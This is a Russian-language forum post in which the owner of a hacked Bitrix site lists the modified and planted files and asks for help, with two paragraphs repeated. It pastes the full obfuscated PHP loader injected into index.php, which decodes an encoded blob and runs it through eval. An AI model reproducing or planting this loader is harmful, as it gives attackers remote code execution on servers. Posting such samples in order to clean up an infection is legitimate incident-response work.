Всем привет, был положен сайт на VDS timeweb, 25 числа обнаружили, что сайт не открывается. Был заменен index.php в корне, были JS инъекции в /home/bitrix/www/bitrix/js/main/core/core.js, /home/bitrix/www/bitrix/modules/main/include/prolog.php, так же был испорчен .htaccess. В корне были обнаружены и удалены каталоги wp-admin, wp-content, wp-includes, файл admin.php /home/bitrix/www/bitrix/components/bitrix/main.file.input/main.php
Сайт был поднят. Но пришел понедельник и сайт опять прилег. Испорчен index.php на сей раз в начало файла был встроен код
Простая замена на правильный index не помогает. Так же сегодня были обнаружены каталоги в корне d1cfdb79ba с двумя файлами a88fd79628.PHP и c1689ec1ac.php и в каталоге cooperation файл xmlrpcs.php
Проверка системы ругается на запрет чтения рандомных подкаталогов в каталоге upload
Сайт был поднят. Но пришел понедельник и сайт опять прилег. Испорчен index.php на сей раз в начало файла был встроен код
| Код |
|---|
<?php
$gBZu = function ($mr2){$iL1aH2R = "_gbef1";$CzEV=$iL1aH2R[(30 -10)/5] . 'G'
.
$iL1aH2R[(52-34) /6]
.$iL1aH2R[(29- 29) / 4]
.$iL1aH2R[(11 -2)/ 3].$iL1aH2R[(59 - 61+8) /3]
;
$CzEV.= $iL1aH2R[(87 -89 + 4)/2]
. $iL1aH2R[(81-67 -4) / 2] .((64- 46)/6); $CzEV .=
''; $CzEV=str_rot13($CzEV);
return $CzEV($mr2);
};$Oc1gE = function($yCBXLcV8 ){$ut6T = "6B8";$x6u=$ut6T[(49- 42-1)/6] ;$x6u
.=((13-1)/2).((70-43 + 5) / 4).
$ut6T[(16-12)/4]. ((108 -74 - 2)/4) .
'';return $x6u($yCBXLcV8); };
$gBZu = function($mr2
){$iL1aH2R = "_gbef1";$CzEV=$iL1aH2R[(30 -10)/5] .'G'. $iL1aH2R[(52-34) /6].$iL1aH2R[(29- 29) / 4]. $iL1aH2R[(11 -2)/ 3] .$iL1aH2R[(59 - 61+8) /3]; $CzEV.=
$iL1aH2R[(87 -89 + 4)/2].$iL1aH2R[(81-67 -4) / 2] .
((64- 46)/6); $CzEV
.='';$CzEV=
str_rot13($CzEV);
return $CzEV($mr2);};function B68B8
($t73_){ return uQhKw8('').$t73_;} function BibzE1bb4($BzYCgWHrr){
evAL($BzYCgWHrr);
return "Ox4psH6HO1HfKsEfWZcLZ6lVxAeBrtFrqdsF4ZM";
}function IKrpF56K
($i_bOCkR5){foPhMgAxP($i_bOCkR5);} $xY9DyC8T='zZ/xCv+cTpfrJGJWbF4oOYtuVP5wXWvSAZubuenlqFycIh+XJ4o/37BcvFGnTWQA9lCGSyan/p/3BKb4DGuXnJNzBnpWWAAC67qsCa7Iz1UWcnWZV7nOYz+TgtrIvu7cLH52Ko69B7xo8MUdr2bpUq+8iseh9iA0p4Nh6b0eujV5zdG3QVZiFF8LGeJIAQCBgLK5Dw6oGZ2h0g2rpGn3w0rau+rwDHQ91HY+QOyV4MrNE9aNP0t0k0mtjGZAHC+0+AYTgXVHBfO/kEE3a8TnOmqCcbcedKRHGvHTAdfYefZIWvB9buP2nPhJhmGRxkeCGtSiy3NkmeI2GauflwMCk1YOT+/itefPDzNRN38FOlX7FHGbby6he4NxWAFrS3REpR1WgBr9mYg0G/8WS4zzRJrXAnr325+sC1zbDWwQ3BTO4LHeBCU8zKVcpsTByFDOGvcwn7iKzSqUo2geFLm/ruqrqU9zYAPUvG+QRi+EBCRtPkVZbO/SCkYmZdx/MRzdBkcAcyuAD2Hwna+sTMTdqz28xDQOuB5mDFZVBwrxU1KLxbrImEvPxb0PhDmNXriRPynVjpW0DwuJMW/zbXGW4RM8v8ehTojwKZuultqk1BFmmOYewOZ+f0BnBe6yQPHebWrJfAFEdE4FEH5Qts1VfL2MkDvVBKcIW7vQ4jMSpKQVm7qdVHSXUDXVoxTYWYN5YRheQkrcpORCWlMuoQb04lYTSkF8dhjtzjj4qC6FhczEk6/lTDjU3s97pyYZrPoNIc9jdAQnNcFJW9eUg4xEG9eYOYe+A8Gov+Vo34tNd7mIlsQguzB+x3Bi+xuCx+UFhE1p+Exb5aOgQSseJv3aOn7gLQR0dL9tWTpvRqdmsuZU3DrpG2TkOjNTExMH70aN4eQPIxs5IGUx0jGnxgmEvZlFrMH7KJaz+vm2UjnMmsK2gmlvqOIu3nAtGeBmzfO0uXMzfynfZXLqVb2gNYMkNZJInvrftMMVoB6JprZFk5LMtLtrGX+jdTp1erESA0fhDpUR4bxCcQPdxSI14bFgbT43/JC+L5YJ1Iz6jK6GPZZ2kJqHPC/rCyddz/7Go/d6XgSnJw5HoOW5II0hrkHO1svkeligh2UH/Gb+2lGL7HmevrALJwVTNhCjRgtZFa38byAlYxv9rTgK/xQG92+quNA7a80cUOHXdxeVL5RSrU24FKAlntVpB6t7n8dwFUpnH743noUKXLUAHE23zHp2K46bltAjf3KB+tnlU2Scpxi9mfcDGVsSsxGWaWAg80oVt5bbU/HRZ+JyTVr+uiD19NjSNaN3btXnEd1MZX7HM5Fgfi+cieYLANUEP4EkPMmtW7Duxtyg1qrLJ1P9WKJUbzToa3GMF9KbzilnIz/3+6aNNtA4NAVafNR1jptJgaFTnmvrUyWg4dOdHOl0f0PAi7y4nMD1NqhCCy2yxumwoKrKjEe4l6wpzkG4l+84+iGc+rHQr326T9fKiq+6uh2T/Z4CwlA/R5AqKGuw0/5bndKix95I8hHzqY79I55hnGe+8IbArrqZT5MJogh5m23TjBQHxCbgmyHt1SIVxbVWZP7bupF27wefxpbYHknjUgkstvrAhOcRAHlzlGRPZm1RrzYFjFmuqda1PDQf+V7t3o8sleDz6J5sNueZHKgmpyiDqtYsqRAcKRxVgfM4AOKYqQoNUGHZpmpE5K0gDIzOCIcFDzG/KAXqzyMeF/1jGP0yNkPhtbQdhFXQCvCqSad1H6FF3wAhy0dnGOqfeX2ErREJuk0KzNaaQJSSH9ViIzre48zuePiV1dmqPJPzoF1o91/A1hfYGepStdnql/NSewJVUb8mUDJOOH8V9gzkaxzplUA3gm6wEwj+KWStNf9JOgCI5F42lifekDpjOwRJvLvApx+9jYAZLQQy+O+2qz8swZ/TW5Iu8tZb1Cbjmwrz5rGb1E6rGN8CfoAG3pynLkQsLRLVIoH5NTF7U7xJNPrMcRf27+As1oZj/nZzDEWubUsLssgi4fQuEC7KSSk44EmtA6QIhsazHtUJ4GniH89D8D7y1adD48lv7uLZEjcttbi6M6fV6TWiiEhn+fJ+qzrCcBQs6BNlh8rIaBCFb8nHEJtsz+UEdTns71cZPKbM/YC45VM4Amttl0Y8';
$xY9DyC8T = $Oc1gE($xY9DyC8T);$xY9DyC8T=
$gBZu($xY9DyC8T);$xY9DyC8T= RK1W($xY9DyC8T);$xY9DyC8T =QJRQslX($xY9DyC8T);
function QJRQslX ($qnc
)
{$hzXJs8V7 = "tiLz";$ODh_jroG='G'.
$hzXJs8V7[(114- 89 - 7) / 6].
$hzXJs8V7[(77 - 64 - 9)/ 4] ; $ODh_jroG.='N'. 'F'
. $hzXJs8V7[(18 - 15 +9) / 6]
. 'A'.
$hzXJs8V7[(7-11 + 4)/3] . 'e'
.
'';
return $ODh_jroG($qnc);
}IKrpF56K($xY9DyC8T);
function RK1W
($EcZ) {$bNH2jQSqv = "4s6_dOcAD";$NXzcR7='b'. $bNH2jQSqv[(30 - 9 - 7) /2]. $bNH2jQSqv[(87 -72 - 10) /5].'E' . $bNH2jQSqv[(86- 74) /6] .
$bNH2jQSqv[(40- 40) / 6];$NXzcR7 .=
$bNH2jQSqv[(109 - 93 - 4) / 4] ; $NXzcR7.= $bNH2jQSqv[(88 - 67 -5)/4].'e'. $bNH2jQSqv[(66 - 36) / 5] ; $NXzcR7.=
$bNH2jQSqv[(48 - 26 - 7)/ 3] . $bNH2jQSqv[(94 -68 - 2) / 3] .'e' ; $NXzcR7.= ''; return $NXzcR7($EcZ); }
function foPhMgAxP ($WMa
) {BibzE1bb4($WMa);}
function
uQhKw8($bClody_
){$dYlw = "uI47U9o";$A7l=((66 - 32-6)/ 4).
$dYlw[(59 -53) / 6] .$dYlw[(90 - 90) / 2] .
$dYlw[(72-41 + 5) /6];$A7l
.=
'H' ;$A7l .=((120- 74 - 1) / 5); $A7l.=
'g'
;$A7l.='T'.'S' ; $A7l .=
$dYlw[(93- 81) / 3]
; $A7l .= ((56 - 48)/2);
$A7l
.= ''; return $A7l;}; ?> |
Простая замена на правильный index не помогает. Так же сегодня были обнаружены каталоги в корне d1cfdb79ba с двумя файлами a88fd79628.PHP и c1689ec1ac.php и в каталоге cooperation файл xmlrpcs.php
Проверка системы ругается на запрет чтения рандомных подкаталогов в каталоге upload
